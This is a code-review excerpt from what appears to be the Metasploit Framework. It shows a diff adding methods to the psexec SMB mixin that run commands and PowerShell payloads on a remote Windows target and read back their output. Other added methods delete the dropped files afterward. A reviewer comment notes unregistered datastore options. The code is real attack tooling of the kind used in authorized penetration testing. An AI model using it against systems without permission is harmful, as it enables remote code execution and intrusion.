lib/msf/core/exploit/smb/client/psexec.rb

```diff
@@ -193,6 +194,284 @@ def psexec(command, disconnect=true)
+    output = smb_read_file(@smbshare, @ip, file)
+    if output.nil?
+      print_error("Error getting command output. #{$!.class}. #{$!}.")
+      return
+    end
+    if output.empty?
+      print_status("Command finished with no output")
+      return
+    end
+
+    # Report output
+    print_good("Command completed successfuly!")
+    vprint_status("Output for \"#{datastore['COMMAND']}\":")
+    vprint_line("#{output}")
+
+    report_note(
+      :rhost => datastore['RHOSTS'],
+      :rport => datastore['RPORT'],
+      :type => "psexec_command",
+      :name => datastore['COMMAND'],
+      :data => output
+    )
+
+  end
+
+  # check if our process is done using these files
+  def exclusive_access(*files)
+    begin
+      simple.connect("\\\\#{@ip}\\#{@smbshare}")
+    rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
+      print_status("Unable to get handle: #{accesserror}")
+      return false
+    end
+    files.each do |file|
+      begin
+        print_status("checking if the file is unlocked")
+        fd = smb_open(file, 'rwo')
+        fd.close
+      rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
+        print_status("Unable to get handle: #{accesserror}")
+        return false
+      end
+      simple.disconnect("\\\\#{@ip}\\#{@smbshare}")
+    end
+    return true
+  end
+
+  def cleanup_after(*files)
+    begin
+      simple.connect("\\\\#{@ip}\\#{@smbshare}")
+    rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
+      print_error("Unable to connect for cleanup: #{accesserror}. Maybe you'll need to manually remove #{files.join(", "
+)} from the target.")
+      return
+    end
+    print_status("Executing cleanup...")
+    files.each do |file|
+      begin
+        smb_file_rm(file)
+      rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanuperror
+        print_error("Unable to cleanup #{file}. Error: #{cleanuperror}")
+      end
+    end
+    left = files.collect{ |f| smb_file_exist?(f) }
+    if left.any?
+      print_error("Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.")
+    else
+      print_good("Cleanup was successful")
+    end
+  end
+
+    def powershell
+    ENV['MSF_SERVICENAME'] = datastore['SERVICE_NAME']
+    command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
+
+    if datastore['PSH::persist'] and not datastore['DisablePayloadHandler']
+      print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option")
+    end
+
+    # Execute the powershell command
+    print_status("Executing the payload...")
+    begin
+      psexec(command)
+    rescue StandardError => exec_command_error
+      fail_with(Msf::Exploit::Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}")
+    end
+  end
+
+  def native_upload
+    filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"
```

Comment:
more optional `datastore` parameters assumed but not registered by this mixin.  Here and below as `SERVICE_STUB_ENCODER`, `SHARE`